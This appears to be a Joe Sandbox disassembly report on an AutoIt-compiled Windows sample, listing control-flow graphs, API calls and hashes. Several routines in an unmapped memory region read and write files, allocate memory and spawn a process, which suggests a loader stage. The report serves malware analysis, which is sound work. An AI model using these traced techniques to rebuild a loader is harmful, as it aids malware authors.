                                                                control_flow_graph 661 713170-713185 662 7131e5-7131e7 661->662 663 713187-71318a 661->663 662->663 664 7131e9 662->664 665 7131eb 663->665 666 71318c-713193 663->666 667 7131d0-7131d8 DefWindowProcW 664->667 668 7131f1-7131f6 665->668 669 752dfb-752e23 call 7118e2 call 72e499 665->669 670 713265-71326d PostQuitMessage 666->670 671 713199-71319e 666->671 672 7131de-7131e4 667->672 674 7131f8-7131fb 668->674 675 71321d-713244 SetTimer RegisterWindowMessageW 668->675 703 752e28-752e2f 669->703 673 713219-71321b 670->673 677 7131a4-7131a8 671->677 678 752e7c-752e90 call 77bf30 671->678 673->672 679 713201-713214 KillTimer call 7130f2 call 713c50 674->679 680 752d9c-752d9f 674->680 675->673 682 713246-713251 CreatePopupMenu 675->682 683 752e68-752e77 call 77c161 677->683 684 7131ae-7131b3 677->684 678->673 694 752e96 678->694 679->673 686 752dd7-752df6 MoveWindow 680->686 687 752da1-752da5 680->687 682->673 683->673 691 752e4d-752e54 684->691 692 7131b9-7131be 684->692 686->673 695 752da7-752daa 687->695 696 752dc6-752dd2 SetFocus 687->696 691->667 697 752e5a-752e63 call 770ad7 691->697 701 713253-713263 call 71326f 692->701 702 7131c4-7131ca 692->702 694->667 695->702 704 752db0-752dc1 call 7118e2 695->704 696->673 697->667 701->673 702->667 702->703 703->667 709 752e35-752e48 call 7130f2 call 713837 703->709 704->673 709->667
                                                                APIs
                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0071316A,?,?), ref: 007131D8
                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,0071316A,?,?), ref: 00713204
                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00713227
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0071316A,?,?), ref: 00713232
                                                                • CreatePopupMenu.USER32 ref: 00713246
                                                                • PostQuitMessage.USER32(00000000), ref: 00713267
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                • String ID: TaskbarCreated
                                                                • API String ID: 129472671-2362178303
                                                                • Opcode ID: b4be320d5adc2527b7a8e269a74008760d407987c8a9898ead6ec6f63bec1f27
                                                                • Instruction ID: d7498f32f24b11cbad3cbb81253b2ba8205f76f692222e2ce03392ead23fc2e5
                                                                • Opcode Fuzzy Hash: b4be320d5adc2527b7a8e269a74008760d407987c8a9898ead6ec6f63bec1f27
                                                                • Instruction Fuzzy Hash: B9414731300288BBDB156B7C9C4EBFD3A29F74A340F448125F9029A1E2CB7DDAC197A5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D%~$D%~$D%~$D%~$D%~D%~$Variable must be of type 'Object'.
                                                                • API String ID: 0-420399204
                                                                • Opcode ID: 8103e914faa7ddbd8c36737a4c7fcced7c7e4f75892f2d487e8ec9f964e56511
                                                                • Instruction ID: 94363d80158af7caf441515a0b8c4c1a1b1c2a9919407c6a54c4d09885264466
                                                                • Opcode Fuzzy Hash: 8103e914faa7ddbd8c36737a4c7fcced7c7e4f75892f2d487e8ec9f964e56511
                                                                • Instruction Fuzzy Hash: 40C28A71E00215CFCB24CF58C894AADB7B1BF19310F248569ED56AB392D379ED82CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1227 1320118-132016a call 1320018 CreateFileW 1230 1320173-1320180 1227->1230 1231 132016c-132016e 1227->1231 1234 1320182-132018e 1230->1234 1235 1320193-13201aa VirtualAlloc 1230->1235 1232 13202cc-13202d0 1231->1232 1234->1232 1236 13201b3-13201d9 CreateFileW 1235->1236 1237 13201ac-13201ae 1235->1237 1239 13201db-13201f8 1236->1239 1240 13201fd-1320217 ReadFile 1236->1240 1237->1232 1239->1232 1241 132023b-132023f 1240->1241 1242 1320219-1320236 1240->1242 1243 1320260-1320277 WriteFile 1241->1243 1244 1320241-132025e 1241->1244 1242->1232 1246 13202a2-13202c7 CloseHandle VirtualFree 1243->1246 1247 1320279-13202a0 1243->1247 1244->1232 1246->1232 1247->1232
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0132015D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                • Instruction ID: e4c67031042b6461a37d3d92c8cb92528aee4ac75af376cbd5aaecaec0f029d4
                                                                • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                • Instruction Fuzzy Hash: 4C511A75A50209FBEF24EFA4CC49FDE7778AF48704F108514F60AEB180DA74A644CB60

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1267 712c63-712cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                APIs
                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00712C91
                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00712CB2
                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00711CAD,?), ref: 00712CC6
                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00711CAD,?), ref: 00712CCF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$CreateShow
                                                                • String ID: AutoIt v3$edit
                                                                • API String ID: 1584632944-3779509399
                                                                • Opcode ID: a3b949660ac9a5c9714c627a93af04e0220dc3501074f5bc28d72a468e7fb54c
                                                                • Instruction ID: dfd36fd927c4f82ca94494c4970cb2751ac708fe6d468624cc0fad9be2f9d430
                                                                • Opcode Fuzzy Hash: a3b949660ac9a5c9714c627a93af04e0220dc3501074f5bc28d72a468e7fb54c
                                                                • Instruction Fuzzy Hash: F1F0DA755412D07AEB311717AC8AE772EBDD7CBF50B80805AF900AA9A0C6791851DAB8

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1656 1321be8-1321d2e call 131f7f8 call 1321ad8 CreateFileW 1663 1321d30 1656->1663 1664 1321d35-1321d45 1656->1664 1665 1321e02-1321e07 1663->1665 1667 1321d47 1664->1667 1668 1321d4c-1321d66 VirtualAlloc 1664->1668 1667->1665 1669 1321d68 1668->1669 1670 1321d6d-1321d84 ReadFile 1668->1670 1669->1665 1671 1321d86 1670->1671 1672 1321d88-1321d9d call 1320868 1670->1672 1671->1665 1674 1321da2-1321ddc call 1321b18 call 1320ad8 1672->1674 1679 1321df8-1321e00 1674->1679 1680 1321dde-1321df3 call 1321b68 1674->1680 1679->1665 1680->1679
                                                                APIs
                                                                  • Part of subcall function 01321AD8: Sleep.KERNELBASE(000001F4), ref: 01321AE9
                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01321D24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateFileSleep
                                                                • String ID: OKYXKFXGW9FGTCO9BN0IUGG67
                                                                • API String ID: 2694422964-1701341331
                                                                • Opcode ID: e27014f07645df3320b1c3d49663a68e9be9656beef294eba7d1ce77b6a0dbe5
                                                                • Instruction ID: af5e191a76f89be484def392a65b67e52ca6fec551302ec6690177556b223d3c
                                                                • Opcode Fuzzy Hash: e27014f07645df3320b1c3d49663a68e9be9656beef294eba7d1ce77b6a0dbe5
                                                                • Instruction Fuzzy Hash: 10619570D04298DBEF11E7B8C954BEEBBB89F15304F044198E2487B2C1D7B90B49CB65

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1719 713b1c-713b27 1720 713b99-713b9b 1719->1720 1721 713b29-713b2e 1719->1721 1722 713b8c-713b8f 1720->1722 1721->1720 1723 713b30-713b48 RegOpenKeyExW 1721->1723 1723->1720 1724 713b4a-713b69 RegQueryValueExW 1723->1724 1725 713b80-713b8b RegCloseKey 1724->1725 1726 713b6b-713b76 1724->1726 1725->1722 1727 713b90-713b97 1726->1727 1728 713b78-713b7a 1726->1728 1729 713b7e 1727->1729 1728->1729 1729->1725
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00713B0F,SwapMouseButtons,00000004,?), ref: 00713B40
                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00713B0F,SwapMouseButtons,00000004,?), ref: 00713B61
                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00713B0F,SwapMouseButtons,00000004,?), ref: 00713B83
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: Control Panel\Mouse
                                                                • API String ID: 3677997916-824357125
                                                                • Opcode ID: 6c5452fc065eb7a4e93cd530fb7913faf89614a159613aa6855c33ed05ac17ca
                                                                • Instruction ID: 0078ff801ee003af4fd72b8af98ec4cb76e4bac48958a350de0f80346895b6ad
                                                                • Opcode Fuzzy Hash: 6c5452fc065eb7a4e93cd530fb7913faf89614a159613aa6855c33ed05ac17ca
                                                                • Instruction Fuzzy Hash: A41127F5614208FFDB218FA9DC85AEFBBB8EF45744B10846AA805D7150E2359E809BA4

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1730 713923-713939 1731 713a13-713a17 1730->1731 1732 71393f-713954 call 716270 1730->1732 1735 753393-7533a2 LoadStringW 1732->1735 1736 71395a-713976 call 716b57 1732->1736 1738 7533ad-7533b6 1735->1738 1742 7533c9-7533e5 call 716350 call 713fcf 1736->1742 1743 71397c-713980 1736->1743 1740 713994-713a0e call 732340 call 713a18 call 734983 Shell_NotifyIconW call 71988f 1738->1740 1741 7533bc-7533c4 call 71a8c7 1738->1741 1740->1731 1741->1740 1742->1740 1756 7533eb-753409 call 7133c6 call 713fcf call 7133c6 1742->1756 1743->1738 1745 713986-71398f call 716350 1743->1745 1745->1740 1756->1740
                                                                APIs
                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007533A2
                                                                  • Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A
                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00713A04
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                • String ID: Line:
                                                                • API String ID: 2289894680-1585850449
                                                                • Opcode ID: 8b1e5699bf26656873eddd638e0d5355bab38f61e4982ec483e2a58f6e0d7caa
                                                                • Instruction ID: bd7a0b599e1d0cff4a3815d3206242eb45fa1ec06cc4b7e8de1586e7fe723869
                                                                • Opcode Fuzzy Hash: 8b1e5699bf26656873eddd638e0d5355bab38f61e4982ec483e2a58f6e0d7caa
                                                                • Instruction Fuzzy Hash: CC31C571409344AAD721EB18DC4ABEBB7ECAF44714F00451AF599930D1DB7CA689C7C6

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1766 712de3-712e03 call 751f50 1769 712e09-712e2c call 713aa2 call 712da5 call 713598 call 7144a8 1766->1769 1770 752c2b-752c94 call 732340 GetOpenFileNameW 1766->1770 1784 712e31-712e34 1769->1784 1775 752c96 1770->1775 1776 752c9d-752ca6 call 716b57 1770->1776 1775->1776 1780 752cab 1776->1780 1780->1780
                                                                APIs
                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00752C8C
                                                                  • Part of subcall function 00713AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00713A97,?,?,00712E7F,?,?,?,00000000), ref: 00713AC2
                                                                  • Part of subcall function 00712DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00712DC4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Name$Path$FileFullLongOpen
                                                                • String ID: X$`e}
                                                                • API String ID: 779396738-2683834941
                                                                • Opcode ID: 0164105ea38a0198ec167846dc3ec67a85c8c89ed149bc93c7e9c5bf856b026e
                                                                • Instruction ID: 5260650d06b0f85b87e6d1abacea3563a0e0ab950da70406ffa2e126c88eb735
                                                                • Opcode Fuzzy Hash: 0164105ea38a0198ec167846dc3ec67a85c8c89ed149bc93c7e9c5bf856b026e
                                                                • Instruction Fuzzy Hash: A7219671A00298DBDB41DF98D8497EE7BF89F49705F10805AE405A7282DBBC5A8D8F61
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00730668
                                                                  • Part of subcall function 007332A4: RaiseException.KERNEL32(?,?,?,0073068A,?,007E1444,?,?,?,?,?,?,0073068A,00711129,007D8738,00711129), ref: 00733304
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00730685
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                • String ID: Unknown exception
                                                                • API String ID: 3476068407-410509341
                                                                • Opcode ID: cb683327ea0a61869f7e0dc415cae4945d90b9086b7683a7373a17f16194cb6a
                                                                • Instruction ID: 3738ef3aa7bc16a0498bd7a634489059d13cb8c70dca95bfeb5e720267212109
                                                                • Opcode Fuzzy Hash: cb683327ea0a61869f7e0dc415cae4945d90b9086b7683a7373a17f16194cb6a
                                                                • Instruction Fuzzy Hash: D7F0C234A0020DF7DB04B6A4E86AD9E777C6E40320F604532F824D6597EF79EA65C5C1
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 0132083D
                                                                • ExitProcess.KERNEL32(00000000), ref: 0132085C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process$CreateExit
                                                                • String ID: D
                                                                • API String ID: 126409537-2746444292
                                                                • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                                • Instruction ID: 823442d85f4af858db9b492d279f69f4475d725b97bb31a3a3b17a834145c561
                                                                • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                                • Instruction Fuzzy Hash: ACF0FF7294025CABDB60EFE4CD49FEE777CBF08705F408518FB1A9A180DA7496088BA1
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007982F5
                                                                • TerminateProcess.KERNEL32(00000000), ref: 007982FC
                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 007984DD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                • String ID:
                                                                • API String ID: 146820519-0
                                                                • Opcode ID: 44adabc1d2336dc97174abbb5915219ce4c2438cfd34969e4da5d122497a06b5
                                                                • Instruction ID: 5fa6b82696a53ee28fba476b4ad9c778bb96f18bcebbb22f52d293ba081f22d6
                                                                • Opcode Fuzzy Hash: 44adabc1d2336dc97174abbb5915219ce4c2438cfd34969e4da5d122497a06b5
                                                                • Instruction Fuzzy Hash: 6D129B71A08341DFCB54DF28D484B6ABBE5BF85314F04895DE8898B292CB39ED45CF92
                                                                APIs
                                                                  • Part of subcall function 00711BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00711BF4
                                                                  • Part of subcall function 00711BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00711BFC
                                                                  • Part of subcall function 00711BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00711C07
                                                                  • Part of subcall function 00711BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00711C12
                                                                  • Part of subcall function 00711BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00711C1A
                                                                  • Part of subcall function 00711BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00711C22
                                                                  • Part of subcall function 00711B4A: RegisterWindowMessageW.USER32(00000004,?,007112C4), ref: 00711BA2
                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0071136A
                                                                • OleInitialize.OLE32 ref: 00711388
                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 007524AB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                • String ID:
                                                                • API String ID: 1986988660-0
                                                                • Opcode ID: 3d12395fc684213075d0232744f24e3bb8755de42ccc99fdd5e1b563f1f2dc13
                                                                • Instruction ID: 55fc5a7b85a390aed54c42a564f7ea5afc2d3248a32d7752b327b437c4c949aa
                                                                • Opcode Fuzzy Hash: 3d12395fc684213075d0232744f24e3bb8755de42ccc99fdd5e1b563f1f2dc13
                                                                • Instruction Fuzzy Hash: 0F717EB49033C09EC785DF69A9876993AE0BB8D3543D4C22A911ACF3A1EB3C5491CF59
                                                                APIs
                                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,007485CC,?,007D8CC8,0000000C), ref: 00748704
                                                                • GetLastError.KERNEL32(?,007485CC,?,007D8CC8,0000000C), ref: 0074870E
                                                                • __dosmaperr.LIBCMT ref: 00748739
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2583163307-0
                                                                • Opcode ID: d9edd168f9b517d021ee5c9dc2a02ff6c2b364a2f9a3044e4896393e8738309d
                                                                • Instruction ID: 220c78d434cec0b5602b0aaeef549645116e905eb5a9ee5840d40c0f354895e9
                                                                • Opcode Fuzzy Hash: d9edd168f9b517d021ee5c9dc2a02ff6c2b364a2f9a3044e4896393e8738309d
                                                                • Instruction Fuzzy Hash: 49018933A0526467D6E66734A889B7E27494B82B78F3A0119F818CB1D3DFACCC818193
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 007217F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Init_thread_footer
                                                                • String ID: CALL
                                                                • API String ID: 1385522511-4196123274
                                                                • Opcode ID: a03a8eb9a67e9b17a0a08ee0e77362c3fc4ec8bbbd6b4bb69c69a577e89bdf24
                                                                • Instruction ID: 95f39f7418a0ebf6ff2b716d1e519465e902f3b8bf85a8ee810a38db45513dec
                                                                • Opcode Fuzzy Hash: a03a8eb9a67e9b17a0a08ee0e77362c3fc4ec8bbbd6b4bb69c69a577e89bdf24
                                                                • Instruction Fuzzy Hash: 6622CB70608351DFC714DF14D484A2ABBF1BF99314FA4896DF8868B3A2D739E851CB82
                                                                APIs
                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00713908
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: IconNotifyShell_
                                                                • String ID:
                                                                • API String ID: 1144537725-0
                                                                • Opcode ID: bb2e8a51d09c54fde73ec256e975dbac0d1bbbe60416a4474f43dac76ab44ed5
                                                                • Instruction ID: 66e2e1dfc3589fba36e3874dcc514136f424ccd4df000746995c296624b9695f
                                                                • Opcode Fuzzy Hash: bb2e8a51d09c54fde73ec256e975dbac0d1bbbe60416a4474f43dac76ab44ed5
                                                                • Instruction Fuzzy Hash: B531D270505300DFD721DF28D8857D7BBE8FB49708F00092EF99997290E7B9AA84CB56
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0071949C,?,00008000), ref: 00715773
